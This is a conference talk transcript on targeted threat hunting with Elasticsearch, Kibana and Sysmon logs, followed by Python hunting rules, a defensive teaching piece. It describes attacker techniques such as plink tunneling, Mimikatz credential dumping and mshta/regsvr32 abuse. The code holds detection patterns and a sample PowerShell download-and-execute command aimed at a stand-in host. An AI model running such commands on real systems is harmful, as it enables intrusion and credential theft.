
Brandon George - Hunt Like You Mean It

BSides Columbus | 55:07 | 173 views | Published 2020-08
About this talk
Strengthening your security posture doesn't end at monitoring. Your SIEMs and EDR solutions are generally designed to find the proverbial needle in a haystack. What do you do when you're looking for the needle in the stack of needles? Advanced Windows event logging and the ELK stack will allow you to log, query, and gain insights that will lay the foundation for hunting and more vigilant monitoring. This presentation was given at BSides Columbus 2020.
Transcript (en)

Good afternoon, BSides Columbus. My name is Brandon George, and this talk is called Hunt Like You Mean It. Just a quick note about myself: currently I am a senior analyst at Binary Defense's SOC, and I am currently developing and maintaining two projects for threat hunting, one of which is curtailed to quick and easy deployments of the Elastic stack for threat hunting, and the other is a fork of Olaf Hartong's sysmon-modular project. So, topics we're going to go over today: we're going to go over what targeted threat hunting is, why we do threat hunts, and how we do threat hunts. So I want to go over just the working definition we're going to use today.

This is pretty much what you'll see across the board, but it is proactively searching for threats or signs of compromise within an environment. So let's go over targeted threat hunting. Targeted threat hunting was an idea that I found to be the most effective in getting small organizations and small deployments for threat hunting up and going. It is a risk-based approach to data retention. One of the many issues that I found in trying to talk about threat hunting was just the sheer volume of data people thought they needed to get started with threat hunting. Threat hunting doesn't need to be a massive deployment; it can start with a department, a few users, a few hosts, but you want to

deploy it based on risk. So what I mean is you want to hunt for users that interact with the outside world a lot: users like HR, who are going to be receiving resumes, who are going to be interacting with people to get them started on their jobs. You want to talk to and hunt for accounting; they receive a lot of expense reports, they're going to be talking with vendors about costs. These are the types of users you're going to want to hunt for, because we want to protect those users. We want to make sure that they can continue to do their job, and that if it's ever the case that they do open a malicious document,

it's not their fault; it's just them doing their job. We still continue to train them, we still continue to do everything we can for them, but if our defenses cannot withstand a maldoc, that speaks more lowly of us than it does of them. And so targeted threat hunting helps to aid in those defenses, because if we just focus on our critical assets we're already going to catch it way late in the game, and so we want to be able to focus and start at the endpoint to catch it early and hopefully see it before our EDR does. So let's talk about this a little bit more. It reduces the amount of logs

we're going to ingest by sheer volume, but it's going to increase in diversity because we're going to take it from multiple different sources. It's easier to manage for small to medium organizations because you're focused on maybe specific departments comprised of only a few people, rather than large organizations, where you could do the same thing but your departments are going to be larger and you may not want to focus so much on-premise as maybe you would consider doing in a small to medium organization. It's really going to come down to whatever is going to be the most cost effective and easiest to manage, because when it comes to this you've got to not only organize the operational side

of it but you've got to be able to maintain and equip the hunters who are going to be in your platforms. So why do we hunt? I think the definition itself gives a pretty good reason about why it's a hunt: you're proactively searching for threats and anomalies, and I want to kind of harp on anomalies because it is easier to hunt for anomalies than it is for threats. And so with all that in mind, it equips us to do a couple of other things as well. It allows us to get familiar with our environments and to notice anomalies as they happen, or in a very short period of time. It equips us in such a way that when we do

these deployments we can get a feel for what is normal for these hosts, and when something deviates from that normal behavior we can kind of catch it and investigate. The last, and I think most important, thing that threat hunting enables us to do, and why we ought to be doing it, is that we can detect what we're not detecting. We can write rules and searches that maybe our EDR or our SIEM are just not designed or equipped to do at this point in time, and once we notice that, oh okay, we actually have evidence that something is happening, we can incorporate those detections into our SIEM, into our EDR platforms, and then go forward not just to

embed your organization but to also maybe make your vendor better; that way you both have something to benefit from whatever you're seeing and making use of those logs for. So let's talk about types of hunts. Tyler Hudak not too long ago wrote a blog for TrustedSec talking about what types of threat hunts you're going to be doing. Typically there's only going to be two: there's a targeted threat hunt and there's going to be a general threat hunt. The targeted threat hunt is when you know you have ants in your house. You know there is maybe some kind of BEC, or you have ransomware, or really any type of malware or actor in your

environment, and you can specifically narrow it down to at least one specific detail that you can hunt for. And maybe you say, you know it's a threat actor, maybe you know you have Emotet in your environment, or, God forbid, you had TA505 in your environment. You know what's going to kind of follow, and you can threat hunt based on those details, based on previous reports or what researchers are posting about. These kinds of things are huntable; they're focused on one threat actor, one piece of malware, and you can go from there. A general threat hunt may be focused on one or two aspects that may be seen

across multiple threat actors, or maybe in particular something that is of value to you from a pen test or from a previous compromise, where you say, why didn't we detect this? So you can do a threat hunt and say, I want to see evidence of malicious PowerShell in my environment. Malicious being: I want to see encoded and compressed commands, I want to see use of EncodedCommand as a switch on the command line, I want to see multiple network connections via PowerShell, things like that. Very general; they're not specific to any one threat actor or type of malware. So let's talk about how we hunt. It starts with knowing your resources.

Before you ever develop a budget, see if you can recommission an old server. If you're a relatively small organization this may not be something that you have available to you, but in a medium to large size organization that just may be something you can save your budget with. See if it's high in RAM and high in storage, because these applications are mainly going to focus on those two. You want to make sure that you have enough network capacity to not create so much ingestion that this becomes more of a problem than a solution. And when we talk about storage, see if you can set up,

and do the math to set up, three to six months of log retention. That is not always feasible, and I'm aware of that; three to six months is a gold standard that a lot of people can't really aspire to, but if you can get one to three months that is a great start, because one to three months of dedicated storage of just logs from hosts that you are interested in can be enough to do great threat hunts on a small but maybe valuable data set. See what the size of the daily logs you want to receive from these hosts is, and kind of go from there, because then

you need to focus on your analysts. Are you going to be able to feed them a steady flow of resources to distinguish a false positive from a true positive? And what are they going to do with gray areas? What are they going to do with hosts, or with logs, that they are unsure about? Are they going to have the time and available resources to study and know what to hunt for? All these things you need to kind of take into consideration, especially if you're working in a team environment and you are not just the lone security guy that we have developed a mythos around. So let's talk about logs. Know your log

sources. Do you have departments or specific hosts that you are really interested in and want to always kind of keep an eye on? Maybe you want to keep an eye on your C-suite; you want to hunt for specific users. Again, identify those risky users, because they're going to be of value to you when you are doing your threat hunts. Keeping your assets in scope makes retention much easier, and it opens up other opportunities later to increase what types of logs you're going to be ingesting. Once you know what you're going to be ingesting, think about what is going to be most valuable to you. You're obviously going to

have Windows operational logs, but are you going to deploy Sysmon? Are you going to deploy Zeek? Are you interested in Windows DNS logs? And this should go without saying, but you should be logging PowerShell. All of these things, once put together, can offer you a very clear and valuable picture of what a successful hunt may look like: can you extrapolate these seemingly disparate details to form a clear picture? All right, let's talk about centralized logging. If you want a successful threat hunting program and you want to save an incident responder a lot of time, you must centralize your logging.

Doing it now is much easier than how it used to be, even five to seven years ago. Using shippers like NXLog and Winlogbeat is going to be, I would say, the easiest way to get your logs from your endpoints to your platform now, whatever that may be. And I talked about this before, but make note of how much congestion this might create. If you have enough bandwidth internally this shouldn't be too bad; however, if you are just getting all gung-ho about it this might create some problems. So let's talk about full text searching platforms. Three that I am going to try and just

talk about real quick are the three that I know of and have had experience with. Elasticsearch is remarkably efficient, and what Elastic is doing with their products now I think is quite remarkable. If you want to look at cloud storage, Humio is very effective and I think is a wonderful place to do basic searches and hold all the logs that you're looking for. It's very similar in searching to things like Kibana, and you can pull all sorts of fields out with Humio. Splunk has built quite the reputation in being just the place for log searching. You can do powerful metrics tracking with Splunk, valuable field data that you can pull out and

search for, but it has always kind of come with that hefty price tag. So if it is not something you can do, Elasticsearch and Humio are two cost-effective measures. You can do either in the cloud; Elastic Cloud is relatively inexpensive in comparison to Splunk, but still something you can deploy on prem. Humio is also very cost effective. I will say this, though: if you have a SIEM or an EDR that has searching capabilities, do not go and try and search out a new product unless you are already considering getting rid of whatever you had before. There are some very poor SIEMs that I have seen that have really lackluster searching capabilities,

maybe due to a lack of documentation, or it's just too clunky. If that is something you want to do as a replacement, these three are ones I would encourage you to go look at. So let's talk about searching for anomalies. As a general rule, anomalies are easier to hunt for than threats. The reason being is that threats require that you know that they're threats. When you search for anomalies you have the opportunity to see things that maybe aren't necessarily malicious but are suspicious; maybe it prompts something like, hey, we have a pretty severe misconfiguration with our SharePoint server, things like that. You can use metrics, after you've

pretty repetitiously set baselines, to notice things that are kind of out of line, because once you set baselines you can start catching low-hanging fruit like: should winword.exe be spawning a child process? That's something you can see on an endpoint. I mean, you wouldn't necessarily see that on a server, but you can set up searches to say, hey, is there any process where the parent process is WINWORD? You can set up things like that and have something pretty much instantaneously. Have you looked at mshta recently? If you don't know what mshta is, mshta stands for Microsoft HTML Application. You can write what's called HTA files, and they're essentially

just HTML pages that you can use as a GUI. HP products are using them, Amazon Assistant is built with HTA files, even TeamViewer, if you have the Chrome extension, uses an HTA file as well. All of these things are false positives, but you can pretty easily identify, and we'll see this later, what a malicious use of mshta looks like. You want to talk about low-hanging fruit? Let's talk about users launching and using applications they don't normally use. Should your HR rep be running PowerShell? Things like that can be useful to you to try and narrow down what is considered anomalous. Maybe your HR rep is familiar with PowerShell, and an application they use for employee

management utilizes PowerShell. It may run as that user, but you can quickly identify when something is malicious and when it is not. So let's talk about knowing evil, because this is what threat hunting is all about. You have to be able to read up on blogs, read up on IR reports on what responders are seeing, as well as utilize things like malware reporting feeds such as any.run and URLhaus. If you want fresh malware from researchers and what they're seeing, and you complement that with VirusTotal, you can get the useful sandboxing tools of any.run as well as VirusTotal, and maybe gather sources from URLhaus. I'll touch on threat intelligence real quick. It

can be useful, but is oftentimes less actionable than the sources I just mentioned. I would also recommend studying open source signatures such as Sigma. There are a lot of threat hunters who use Sigma as the basis of just kind of documenting how they are going to form queries, maybe in other platforms. If you have a Sigma rule that you wrote, you can use things like Uncoder to convert from Sigma to KQL for Kibana, which we'll use later. I would also say look at using automated testing suites like Atomic Red Team. Other projects like LOLBAS and GTFOBins are other great sources. If you use Windows, Living Off The Land Binaries and

Scripts, or LOLBAS, is a great repository by Oddvar Moe at TrustedSec that he has been building for years now. It is a wonderful repository that I pretty much used from the get-go to search for, to really understand, what malicious uses of regsvr32 look like, malicious uses of rundll32; all of these things you can find in that repository and more. And if you're using the Linux equivalent, GTFOBins, there is a plethora of resources you can use to hunt on Linux. Something I would pretty much equate in the threat intelligence realm is the MITRE ATT&CK framework. It is useful if you're hunting for techniques, and if you're using something like Olaf

Hartong's sysmon-modular configuration, that is all tagged with MITRE techniques, and you can search for that. Depending on how your logs are parsed, you can search by technique in all of your platforms. So then let's talk about knowing normal. Someone I want to bring your attention to, and whose resources I've used to even help develop this talk, is Samir over at Elastic. He, I think since I've found him, has been talking about knowing normal: how to filter out, and try and increase your detections and threat hunts by just filtering out and looking at startup processes in Windows. That's an easy thing you can do, and we'll get into that in a little bit

later as well. But again, this idea of baselining is fundamental to threat hunting, as much as it is to searching, because if you are not able to filter out what is normal you're going to have a very hard time making this program effective. So let's talk about building hunts. There are three ways to kind of categorize how you can build hunts. You can use automated testing platforms like Atomic Red Team, as well as build your own scripts and tests with LOLBAS, but then you're going to have to eventually get to a point where you're going to have to call on a professional. So pen tests or any type of security test might be something you look into. It's

expensive, but it may be worthwhile. It's a better way to test your detections and know what artifacts are being left behind. If you can get in communication with your pen tester and say, hey, we want to do an assumed breach on our HR department, we'll have either a drop box or we will set you up with an account on here, and you can kind of go from there. Again, it's a quick and dirty way to do it, and it'll often take a week, maybe two weeks at most, and it's something where you can say, hey, we want to test our detections for our threat hunting team, and go from

there, because a lot of the time you're going to have to do this for compliance anyway, so why not make use of it for your other teams? Now, the most expensive way to really build hunts is around red team exercises. I have heard in the past of red teamers getting caught by threat hunting teams because they're consistently looking for things that they know their EDR and SIEM platforms are simply just not catching, because correlation rules would be too complex, or maybe they don't have the kind of rapport with their EDR vendor to say, hey, we want to detect this, and maybe they're just not willing to do it at that point in time.

So having a threat hunting team can help remediate both of these problems. So let's talk about what we should be searching. Let's talk about process creations, because it is the bread and butter of most threat hunts. If you are not going to deploy something like Sysmon in your environment, enabling command line auditing with event ID 4688 is the first thing I would do. There's a lot you can collect without having to raise your events per second in something like a SIEM, and if you want to use a SIEM for threat hunting, again, it's not going to raise your EPS, and you can start flagging things like suspicious process creations,

suspicious service creations, things like that, that are going to be useful to you. Maybe not service creations for 4688, but at the very least you can start filtering out known and trusted applications with event ID 4688. So let's talk about a simple persistence mechanism that's been used for years: that is the Run and RunOnce registry keys. Malware to this date is still using this as a persistence mechanism for system reboots and user logons, and they can start their process as whoever, based on which registry hive it's attempting to be run out of. Let's talk about PowerShell. It is quickly going out of style with our favorite red teamers

or pen testers, because auditing, PowerShell version two aside, is so much better than what it was when it first got started. However, again, commodity malware is still using it because it's just easier that way. Maybe they'll hope they'll get an easy win and they won't get caught, but you may not get so lucky with your local pentester. Let's talk about scheduled tasks and BITS. BITS is a really remarkable way for malware to call back, get updates and pull down new files in a way that oftentimes people aren't even looking for, so it's really useful to look for signs of URLs inside of BITS jobs, as well as

look for URLs in scheduled tasks. I'll show you a mechanism for privilege escalation utilized by scheduled tasks. So there's almost a one-two punch here with that, because you can use it as a persistence mechanism to maybe restart a job, let's say for a crypto miner; I've seen that in the past. Not just for privilege escalation but also for persistence. So let's also look for unusual calls to vaultcli. You are looking at event ID 7 for Sysmon; that is an image load. You want to look for unusual images attempting to load vaultcli.dll. lsass is going to call vaultcli.dll, but that's because that's what the local security

service is going to do. If you look for any applications in, say, AppData\Roaming, that's something you can look into, especially if it's an untrusted application. So let's talk about group modifications real quick before we go back to path mismatching. If you have maybe an IAM person on your team who can help you keep track of what users are in what groups, maybe you can see users being added or removed from groups that maybe were never specified in your procedures. Things like that can be things you can hunt for. They're not always the most fun hunts, but they can be done. So I want to talk about path mismatching

real quick. Very simple to understand: you can have a list of files that you know are in C:\Windows or in System32, and you can set negation statements to say, I want every instance of rundll32 that is not in C:\Windows or in C:\Windows\System32. Things like that are really easy ones as well, because I can't even think of a good reason why that should happen, but if you see that, investigate it. So I want to talk about DLL search order hijacking. It's a similar idea to path mismatching, except for the fact that it is an untrusted DLL being called by a trusted executable.

If a trusted process is attempting to load maybe some sort of DLL, it's going to look first in its current directory, and then its parent directory, and then whatever is next in its path. So if malware can set itself up in such a way where a trusted application can run its code, it's an easy one. So let's talk about Kerberos. There is a great blog by TrustedSec that goes over how to hunt for Kerberoasting. If you're not familiar with Kerberoasting, take time after this to go look it up. It's very involved, and I'm not even sure I fully understand

it some days, but it is something that, if you use Kerberos in your environment, is very easy to look for and something you can investigate, because if you use Kerberos in your environment you can't stop it; it's just how Kerberos works. Another one you can look for is unusual applications in AppData. Again, the reason I try and harp on AppData so much is that if malware does not have high enough privileges to maybe drop itself in Windows\Temp, it's going to use AppData\Roaming, AppData\Local or AppData\LocalLow. Now let's talk about high volume DNS queries. Something that was first taught to me when I was learning about threat hunting

is high volume DNS TXT record requests. You can form whole scripts just by the records that you can get back from TXT records, because TXT records can hold more data than your usual, say, A or AAAA record. So you can use that to form PowerShell scripts or batch scripts, or even, if you want to pull down all of the data from an executable split into different parts, you can drop that on a host, execute it, and go from there. If you want to get into the deception realm, and it's not going to break compliance, I would say preserve one or two old user accounts, maybe

with some faux security groups, that you can set up searches for to say, hey, if this ever hits we want to be alerted, we want to investigate immediately, because that is a sign of a honey account being used. And then let's talk about processes making unusual network connections. This is one of those things you can set up after you've baselined and set up metrics, to say, hey, are there any processes across any of my hosts that are just hanging off more than usual? I want to show you that in the dashboard for filtering, and you can even curtail that towards searching for applications that

shouldn't be making a lot of network connections, say like cmd or PowerShell, again depending on what is happening. So we'll go from there, and let's get started. So what I'm going to show you is graphs for baselining and filtering, as well as just kind of setting up your own hunting dashboard for things that you can see at a glance. So searches we're going to do today: we're going to look at traces of RDP tunneling, a couple examples of privilege escalation, as well as malicious use of mshta, malicious PowerShell, as well as regsvr32. I'm not going to go over searching by MITRE tag, image or host, just largely due to the fact

that once you have already seen the examples I'm going to show you, you're going to be able to do these on your own. All right, so the first thing I want to show you is an easy way to start filtering via search and then visualizing. So I'm going to go through, since I've already saved it, I'm going to go to Discover, I'm going to open up a search. So the search I'm going to open up is processes making network connections. So here is what the search is comprised of: I have an event code 3, so that is specifically for processes with network connections in Sysmon, and I am just going to, for the sake of the search, show process

executable and event code; that way, in case we want to look at what the raw search data shows us, we can take a look. Now that I have limited the events, or in this case hits, to just events with event code 3, I can save that. I'll save that as "processes making network connections", and then what I'm going to do is go back and go to Visualize. So I have saved a visualization already, but we're going to go through it together. So I'm going to create a new visualization in a data table, and then I'm going to click "processes making network connections"; that way I can see there are 727 events

where there are processes making network connections, however they have collected. So the first thing I'm going to do is split rows. So split rows: I want to click on terms, and then I want to look for that field that we looked at earlier, process executable, and then I want to set it up for five just for this. And I want to split the table, and I want to do columns; actually I'm going to do rows. Now, columns will be fine, and then I'll do terms again, and then I want to have the agent name. So that agent name is what is assigned by Winlogbeat and is kept whenever it hits Elasticsearch. So I'm

going to update that, and here's what I have. You know what, I am going to keep it by rows. All right, so here's what we have: we have Century, which is one of my hosts, and then MSEDGEWIN10; that's another one. So I know that it looks like Mattermost, Windows Defender, GitHub Desktop and service host. It looks like Mattermost is the process that is making the most network connections on my host; it looks like on MSEDGEWIN10 it's service host. So I could start filtering out Mattermost, Windows Defender, maybe Zoom, GitHub Desktop, GoToMeeting, and keep going that way. And so as you

can see, there are a number of ways I can start filtering by this, and I can even do this at the search level. If I go back to Discover and go by this, so let's just say I'm looking for AND NOT a message that contains anything with Mattermost in the name,

and it'll wipe everything out. So if I save that, and then I go back, clear out these errors, and then go back to Visualize, and if I just get rid of all these so that it doesn't clog up my screen, you'll notice that Mattermost is nowhere to be seen. So you can save these for later, and I'm going to do that. Let's say "hosts process making network connections", and then I will save that and keep it for later. It's just that simple. Okay, so we are in the main menu of Kibana, and we've set up our stack, we've ingested some logs, and now we want to do some hunting. So we go to Discover,

and the first thing we're going to search for is signs of RDP tunneling. Generally you're going to look for signs of two things existing in the logs, one of which is signs that an SSH tunnel was created; generally we can see this with various executions of plink, and we can also see this with RDP traffic communicating over the loopback address space. So if you want something to quickly search, just to get maybe not the most efficient query time, you can look for 127.0.0.* and 3389; that way, as long as these two entities exist in the logs, we can search for it. So we're going to search for the past 10 years, and it looks like we have a few

hits. So what I'm going to do is I'm going to hit command line, in case we see an SSH channel being created, and it looks like we see plink running. And let's see the source IP, and then this is the destination IP, yep, destination IP, as well as destination port and source port. So I'm going to move this over near the source IP, and so you can see an SSH tunnel being created, and it looks like there's going to be some sort of callback, and it looks like this could be a reverse connection to, let's see, 10.0.2.18. And there we have it; that's something easy you can search for,

and if we wanted, we could also view the surrounding documents to see what around this time might help us figure out what might have caused the initial exploitation, because at this point they're probably already settling in for the post-exploitation stage and trying to move laterally from pretty much there and out. All right, so we'll go from there on to our next demo. We talked earlier about using scheduled tasks for persistence, but I also failed to mention that scheduled tasks can also be used for privilege escalation. That's what we're going to look at now. So I have a search that says, show me any logs where the task name

exists and i set a field uh i set a column to show me all the task names that we have in here so we'll also look at look at the event id as well so i see you have a couple of 4698 events 4702 and i'm really concerned with these 4698 events so i have four events so one of which is full powers tasks i don't know anything about that let's look at orca update orchestrator i know about that add these three okay well let's take a look here so i have the subject user who created the task looks like it is local service let's take a look at what the content says so i'm usually concerned about what it's

executing so i see exec the command is referencing public users tools token manip so i assume that's token manipulation and then it's tempting to execute full powers.exe well i don't know anything about that per se so let's look at what else we have up here so i'm going to look at the principles it tells us the local service account and i'm going to look at these required privileges real quick so i see assigned primary token privilege audit privilege change notify create global privilege impersonate privilege and working side privilege so i have a feeling this is malicious and i'm sure if i was able to get it get my hands on this executable that might prove to

do that. The reason I believe that is that local service accounts generally do not have high privileges. They have some privileges, but by design they are meant to be restricted. When you add these privileges, you start enabling them to do more. So if you can at least create a scheduled task as LOCAL SERVICE, maybe you can start a process that will require certain privileges to enable, and enable and elevate that user to do more than it was originally intended to do. So I know there's some privilege escalation going on here, but what about maybe some credential dumping? So I want to go over to a different index. I'm going to clear out; I'm just going to start fresh. So I'm

going to get rid of my task name, and I'll get rid of this because this is not in there. So what I'm going to look for is what we mentioned earlier, so let's talk about an image load for vaultcli.dll. So I see this; maybe I'm looking for vaultcli. Is there anything that exists in the logs? And there is. Let's take a look at what process it was. So it looks like PowerShell attempted to load this. Now, oftentimes this is a bit more plentiful depending on what's happening on the host, but I want to see the process ID of this. So I'm going to go up here; I want to filter for that value. So we know that already

exists, but I want to clear out the image load and just look for the process ID, and it looks like we have a couple of hits. And these appear to be, let's see what kind of event IDs these are. So I have an event code; let's just go to the columns and see what we have. It looks like a 1, a 12, and a 7. So let's just start with the 1 and see what we got. Let's go to the command line, and I just like to see all these at once. Well, it looks like, yeah, it looks like there was a DownloadString from the PowerSploit repo to Invoke-Mimikatz and dump the creds,

and I have a feeling this may be the image load that we looked for earlier, so let's see if we can look at what other images were loaded.

So mpv client, okay, here we go. So samlib, okay, so that's for all the local creds, as well as vaultcli. Looks like smart cards, human interface devices, and the crypt DLL. All right, so we already know there's been activity of privilege escalation as well as credential dumping that may potentially be used for privilege escalation in the future, maybe for a user who has domain admin rights on those hosts. The last three examples we're going to look at are a combined use of malicious execution of PowerShell, regsvr32, and mshta.exe. So what I'm attempting to look for is maybe child processes of PowerShell, but first I guess we better look at maybe

just usage of mshta.exe. So let's look at message and mshta; let's just see if it exists anywhere in our logs, and it looks like we have quite a few. So we have some process creations, 4688, and we have some registry edits, 5158. Let's see if I can remind myself what that one is. So it's the filtering platform; it looks like mshta made some sort of network connection. Okay, so do we have any idea where? Not image load. Okay, so I see something here. Okay, that tells us a couple of things. Okay, so let's start looking at these command lines. All right, so it doesn't look like there's too much available to us;

maybe that's not the field we need. Let's look at it. All right, yep, this is just a different field we needed to use, and that's much better. All right, so let's take a look. So we see cmd attempted to launch calc, there were a couple of HTA files put in the startup folder, looks like an Atomic test was run. All right, so this is probably the first thing we want to look at. So we look at mshta attempting to launch just some raw JavaScript, attempting to reach out to githubusercontent, Red Canary Atomic Red Team T1059.001. So it looks like it downloaded the SCT file, and then we see a couple other things, and

then we see, yep, that process creation for mshta.exe, and then, yep, execute and close. There you always see PowerShell attempting to Write-Host with a foreground color. Okay, I wonder if the parent process was mshta. Yup, parent process name mshta, so mshta was even launched from PowerShell. Back up here, keep going. Yeah, I mean, we obviously see something has gone awry, and we see even mshta launch cmd.exe. Okay, so that's definitely one thing we can look at. So maybe we can start with the parent process, because I believe if we looked, it looks like the parent process was PowerShell. Now let's see if we can get the parent PID. Now I'm hoping,

okay, so that's the command line. So let's see if we can filter for this. Nope, not that.

Not that one, sorry. Down.

That's going through all the fields that I don't need. Parent process name, okay.

Well, it looks like we're just going to have to start here and look for that, and we'll just get rid of our query and start there. Now, I don't generally recommend doing this, just because, you know, I'm running this in a test environment; if you have, you know, hundreds of hosts, this may take a while. But it looks like we already get a couple of hits. We have Invoke-BloodHound; yeah, that's a remote download of SharpHound into memory followed by an execution of the script. I would say that's definitely malicious. Keep going; we see there's PowerSploit attempting to be run, there's that credential dump we looked at earlier, Invoke-Bypass, okay.

Now let's see if there's any, because we said we combined this, let's see if there's anything where regsvr32 is being executed. So message, just start like that, and it looks like we have three hits. So we have again an Atomic Red Team test where it's attempting to call an SCT file that exists on the file system, and then we have, yeah, HTTPS making the call to a URL on GitHub, as well as attempting to launch cmd through regsvr32. All right, so we see already that there is enough for us to work with to know that PowerShell is being utilized maliciously in the system,

as well as mshta and regsvr32. All right, so the last thing I want to show you is the dashboards that we can make from all the accumulated saved searches that we've done. So this is the hunting dashboard. So you can see we have malicious use of regsvr32; let's see, we have suspicious use of mshta, we can see that log over here that we looked at earlier, as well as the use of any loopback addresses, as well as port 3389; we see that in a command line as well. And just as a note, these are not all the same logs; this is just from a simple search that we saved, and anytime you see this

being used in a log, you can investigate it pretty easily and see, okay, you know, what was imported, what was the image. And then we can also look at this complex search we built earlier, and you can look at the record of whatever's being used. You can also take a look at the raw data that we have from the PowerShell logs. Now, to quickly move over, I'll show you the filtering dashboard. Now, I built some of these searches at another time, but as you can see, I have host, process, and every connection. So this can be filtered to say, okay, you know, maybe I want to add processes with network connections in my

hunting dashboard. But, you know, maybe I can see, okay, I know that Windows Defender, I can ignore that; it hits 46 times, maybe not such a big deal. But then I can also see things like Sysmon attempted to make a network connection, as well as service host, and then SIHClient. And you can see the most popular command lines, which in this case is pretty clear: out of all the hosts that I have reporting back, hosts with that command line is the most popular, followed by none, so we can probably filter that out. And then the US notification, some NVIDIA stuff, and so on and so forth. You can also filter by most popular

events, so 4673 privilege requests, and then you can also see the most popular domains, and you can, you know, filter that out as well. Maybe you want to ignore github.com; not exactly recommended, because a lot of open source security tools are utilized at GitHub. So those are the dashboards you can create, so you can get all the information that you are looking for at a glance, and you can start filtering from there. All right, so some resources that I can provide and at least show you guys for future reading: Tyler Hudak at TrustedSec. He is the practice lead for incident response and does a lot of threat hunting as well. This blog was very useful; it came at a

very good time to talk about what types of threat hunts you can do and what you might need to talk about. Samir's EVTX-ATTACK-SAMPLES: the logs for privilege escalation, RDP tunneling, regsvr32, all of that was provided from his repository with his permission, and he has a lot of great slide decks and other repositories that he is updating. He's very busy and always working on something. The LOLBAS project and Atomic Red Team are two projects I would encourage everyone to go read and study if you want to do threat hunting, or if you just want to try and grow your knowledge base for detection building. My Twitter is at the hacker 4chan;

I am always very busy on there. It's either feast or famine: I'm either tweeting a lot or I'm not tweeting at all. But I want to talk about the HELK project as well as my own project, ELK Hunt. HELK is an extremely versatile and very creative and very useful project for threat hunting on the ELK stack. This project has been in development for quite a while, and it has grown from very early stages and has come a very long way. It incorporates things like playbooks. If you've ever heard of Mordor, Roberto and his brother are doing a lot of great work over there and are making a wonderful project.

A shameless plug for ELK Hunt: it is and was inspired by the HELK project, but I wanted to try and strip down as much as I could but still keep the bare bones of what makes HELK so useful, and that is the ELK stack, that is shipping, and that is filtering, and trying to make use of visualizers, and trying to offer as many resources to people who want to get started with threat hunting in small environments but maybe who don't have the resources or knowledge to incorporate something like HELK. HELK is turning into a combined detection and threat hunting platform that, you know, incorporates learning; mine does not. I try and stick to the

philosophy of targeted threat hunting and all that it has to offer. If you want to contribute or take a look, I would highly encourage you to do so. It is at a stable build right now and is as simple as two PowerShell scripts. Please take a look. Thank you for your time; I really appreciate it. Again, my name is Brandon George, and this is Hunt Like You Mean It.
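The hunts walked through in the demos above (a 4698 task created by LOCAL SERVICE asking for extra privileges, a credential DLL loaded by PowerShell, mshta/regsvr32 spawning children, and a PowerShell download cradle), rendered as code. This is an added example, not code from the talk, HELK or ELK Hunt; the event records are constructed and the field names are assumptions standing in for whatever your Winlogbeat/Sysmon pipeline produces.

```python
"""Hunting rules for the event types demoed in the talk (added example).
Records are constructed stand-ins for Security / Sysmon events already
shipped into Elasticsearch; field names are assumptions, not a real schema.
"""
import re

# Privileges a LOCAL SERVICE task would not normally need (from the 4698 demo)
ELEVATED_PRIVS = {"SeAssignPrimaryTokenPrivilege", "SeImpersonatePrivilege",
                  "SeCreateGlobalPrivilege"}
CRED_DLLS = {"vaultcli.dll", "samlib.dll"}          # DLLs seen in the image-load demo
LOLBINS = {"mshta.exe", "regsvr32.exe"}
DOWNLOAD_CRADLE = re.compile(r"downloadstring|invoke-expression|\biex\b", re.I)

def hunt(events):
    """Return (rule_name, record_id) pairs for every record a rule matches."""
    hits = []
    for e in events:
        eid, rid = e["event_id"], e["id"]
        # 4698: scheduled task created by a service account asking for privileges
        if eid == 4698 and e.get("subject_user") == "LOCAL SERVICE" and \
                ELEVATED_PRIVS & set(e.get("required_privileges", [])):
            hits.append(("local_service_task_privesc", rid))
        # Sysmon 7: credential DLL loaded by something other than lsass.exe
        if eid == 7 and e.get("image_loaded", "").lower() in CRED_DLLS and \
                e.get("image", "").lower() != "lsass.exe":
            hits.append(("cred_dll_load", rid))
        # Sysmon 1 / 4688: LOLBin parent, or a remote download cradle in the command line
        if eid in (1, 4688):
            cmd = e.get("command_line", "")
            if e.get("parent_image", "").lower() in LOLBINS:
                hits.append(("lolbin_child_process", rid))
            if DOWNLOAD_CRADLE.search(cmd) and "http" in cmd.lower():
                hits.append(("powershell_download_cradle", rid))
    return hits

SAMPLE_EVENTS = [  # constructed records, not real logs
    {"id": 1, "event_id": 4698, "subject_user": "LOCAL SERVICE", "task_name": "FullPowers",
     "required_privileges": ["SeAssignPrimaryTokenPrivilege", "SeImpersonatePrivilege"]},
    {"id": 2, "event_id": 4698, "subject_user": "SYSTEM", "task_name": "UpdateOrchestrator",
     "required_privileges": ["SeChangeNotifyPrivilege"]},
    {"id": 3, "event_id": 7, "image": "powershell.exe", "image_loaded": "vaultcli.dll"},
    {"id": 4, "event_id": 7, "image": "lsass.exe", "image_loaded": "samlib.dll"},
    {"id": 5, "event_id": 1, "image": "cmd.exe", "parent_image": "mshta.exe",
     "command_line": "cmd.exe /c calc.exe"},
    {"id": 6, "event_id": 4688, "image": "powershell.exe", "parent_image": "explorer.exe",
     "command_line": "powershell -c IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://example.invalid/x.ps1')"},
]
```

Each rule is the code form of one saved search from the demos; record 2 (a SYSTEM task with an ordinary privilege) and record 4 (lsass.exe loading samlib.dll) are the benign look-alikes the rules are meant to leave alone.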